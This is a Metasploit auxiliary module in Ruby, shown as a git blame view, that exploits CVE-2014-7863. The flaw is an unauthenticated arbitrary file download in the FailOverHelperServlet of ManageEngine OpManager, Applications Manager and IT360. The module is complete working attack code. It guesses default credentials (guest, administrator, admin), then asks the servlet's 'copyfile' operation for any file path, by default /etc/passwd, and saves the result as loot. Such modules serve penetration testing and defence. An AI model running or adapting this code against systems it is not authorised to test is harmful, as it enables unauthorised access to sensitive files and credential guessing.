metasploit-framework/modules/auxiliary/admin/http/manageengine_file_download.rb

243 lines
7.0 KiB
Ruby
Raw Normal View History

2015-01-28 19:42:17 +00:00
##
2015-02-01 20:16:09 +00:00
# This module requires Metasploit: http://metasploit.com/download
2015-01-28 19:42:17 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Auxiliary
2015-01-28 19:42:17 +00:00
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
2015-01-30 21:21:17 +00:00
'Name' => "ManageEngine Multiple Products Arbitrary File Download",
2015-01-28 19:42:17 +00:00
'Description' => %q{
2015-01-30 21:21:17 +00:00
This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet
on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is
unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This
module will attempt to login using the default credentials for the administrator and
guest accounts; alternatively you can provide a pre-authenticated cookie or a username
and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually
8300). This module has been tested on both Windows and Linux with several different
versions. Windows paths have to be escaped with 4 backslashes on the command line. There is
a companion module that allows the recursive listing of any directory. This
2015-01-30 21:21:17 +00:00
vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.
2015-01-28 19:42:17 +00:00
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
2015-01-30 21:21:17 +00:00
['CVE', '2014-7863'],
['OSVDB', '117695'],
2015-10-28 15:45:02 +00:00
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
2015-01-28 19:42:17 +00:00
],
'DisclosureDate' => 'Jan 28 2015'))
register_options(
[
Opt::RPORT(80),
2015-01-30 21:21:17 +00:00
OptString.new('TARGETURI', [true, "The base path to OpManager, AppManager or IT360", '/']),
2015-01-30 21:26:25 +00:00
OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),
2015-01-30 21:21:17 +00:00
OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),
OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),
OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])
2015-01-28 19:42:17 +00:00
], self.class)
end
def get_cookie
2015-01-30 21:26:25 +00:00
cookie = nil
2015-01-28 19:42:17 +00:00
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'])
})
2015-01-30 21:26:25 +00:00
2015-01-28 19:42:17 +00:00
if res
2015-01-30 21:26:25 +00:00
cookie = res.get_cookies
2015-01-28 19:42:17 +00:00
end
2015-01-30 21:26:25 +00:00
cookie
end
2015-01-28 19:42:17 +00:00
def detect_it360
res = send_request_cgi({
2015-01-30 21:26:25 +00:00
'uri' => '/',
2015-01-28 19:42:17 +00:00
'method' => 'GET'
})
2015-01-30 21:26:25 +00:00
2015-01-28 19:42:17 +00:00
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
return true
end
2015-01-30 21:26:25 +00:00
2015-01-28 19:42:17 +00:00
return false
end
def get_it360_cookie_name
res = send_request_cgi({
'method' => 'GET',
2015-01-30 21:26:25 +00:00
'uri' => normalize_uri('/')
2015-01-28 19:42:17 +00:00
})
2015-01-30 21:26:25 +00:00
2015-01-28 19:42:17 +00:00
cookie = res.get_cookies
2015-01-30 21:26:25 +00:00
2015-01-28 19:42:17 +00:00
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
return $1
else
return nil
end
end
def authenticate_it360(port, path, username, password)
2015-01-30 21:26:25 +00:00
if datastore['DOMAIN_NAME'].nil?
2015-01-28 19:42:17 +00:00
vars_post = {
2015-01-30 21:26:25 +00:00
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'false'
2015-01-28 19:42:17 +00:00
}
else
vars_post = {
2015-01-30 21:26:25 +00:00
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => 'true',
'domainName' => datastore['DOMAIN_NAME']
2015-01-28 19:42:17 +00:00
}
end
res = send_request_cgi({
2015-01-30 21:26:25 +00:00
'rport' => port,
2015-01-28 19:42:17 +00:00
'method' => 'POST',
'uri' => normalize_uri(path),
'vars_get' => {
2015-01-30 21:26:25 +00:00
'service' => 'OpManager',
'furl' => '/',
2015-01-28 19:42:17 +00:00
'timestamp' => Time.now.to_i
},
'vars_post' => vars_post
2015-01-30 21:26:25 +00:00
})
2015-01-28 19:42:17 +00:00
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
return res.get_cookies
end
2015-01-30 21:26:25 +00:00
nil
end
2015-01-28 19:42:17 +00:00
def login_it360
# Do we already have a valid cookie? If yes, just return that.
2015-01-30 21:26:25 +00:00
unless datastore['IAMAGENTTICKET'].nil?
2015-01-28 19:42:17 +00:00
cookie_name = get_it360_cookie_name
2015-01-30 21:26:25 +00:00
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
2015-01-28 19:42:17 +00:00
return cookie
end
# get the correct path, host and port
res = send_request_cgi({
'method' => 'GET',
2015-01-30 21:26:25 +00:00
'uri' => normalize_uri('/')
2015-01-28 19:42:17 +00:00
})
if res && res.redirect?
uri = [ res.redirection.port, res.redirection.path ]
else
return nil
end
2015-01-30 21:26:25 +00:00
if datastore['USERNAME'] && datastore['PASSWORD']
2016-02-01 22:06:34 +00:00
print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...")
2015-01-30 21:26:25 +00:00
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
unless cookie.nil?
2015-01-28 19:42:17 +00:00
return cookie
end
end
2015-01-30 21:26:25 +00:00
default_users = ['guest', 'administrator', 'admin']
default_users.each do |user|
2016-02-01 22:06:34 +00:00
print_status("Trying to authenticate as #{user}...")
2015-01-30 21:26:25 +00:00
cookie = authenticate_it360(uri[0], uri[1], user, user)
unless cookie.nil?
return cookie
end
end
nil
end
2015-01-28 19:42:17 +00:00
def run
# No point to continue if filepath is not specified
2015-01-30 21:26:25 +00:00
if datastore['FILEPATH'].empty?
print_error('Please supply the path of the file you want to download.')
2015-01-28 19:42:17 +00:00
return
end
if detect_it360
2016-02-01 22:06:34 +00:00
print_status("Detected IT360, attempting to login...")
2015-01-28 19:42:17 +00:00
cookie = login_it360
2015-01-30 21:26:25 +00:00
if cookie.nil?
2016-02-01 22:06:34 +00:00
print_error("Failed to login to IT360!")
2015-01-28 19:42:17 +00:00
return
end
else
cookie = get_cookie
end
servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'
res = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),
})
if res && res.code == 404
servlet = 'FailOverHelperServlet'
end
# Create request
begin
2016-02-01 22:06:34 +00:00
print_status("Downloading file #{datastore['FILEPATH']}")
2015-01-28 19:42:17 +00:00
res = send_request_cgi({
'method' => 'POST',
'cookie' => cookie,
'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),
'vars_get' => {
'operation' => 'copyfile',
'fileName' => datastore['FILEPATH']
2015-01-30 21:26:25 +00:00
}
2015-01-28 19:42:17 +00:00
})
rescue Rex::ConnectionRefused
2016-02-01 22:06:34 +00:00
print_error("Could not connect.")
2015-01-28 19:42:17 +00:00
return
end
# Show data if needed
if res && res.code == 200
2015-01-30 21:26:25 +00:00
2015-01-28 19:42:17 +00:00
if res.body.to_s.bytesize == 0
2016-02-01 22:06:34 +00:00
print_error("0 bytes returned, file does not exist or is empty.")
2015-01-28 19:42:17 +00:00
return
end
2015-01-30 21:26:25 +00:00
2015-01-28 19:42:17 +00:00
vprint_line(res.body.to_s)
fname = File.basename(datastore['FILEPATH'])
path = store_loot(
'manageengine.http',
'application/octet-stream',
datastore['RHOST'],
res.body,
fname
)
print_good("File saved in: #{path}")
else
2016-02-01 22:06:34 +00:00
print_error("Failed to download file.")
2015-01-28 19:42:17 +00:00
end
end
end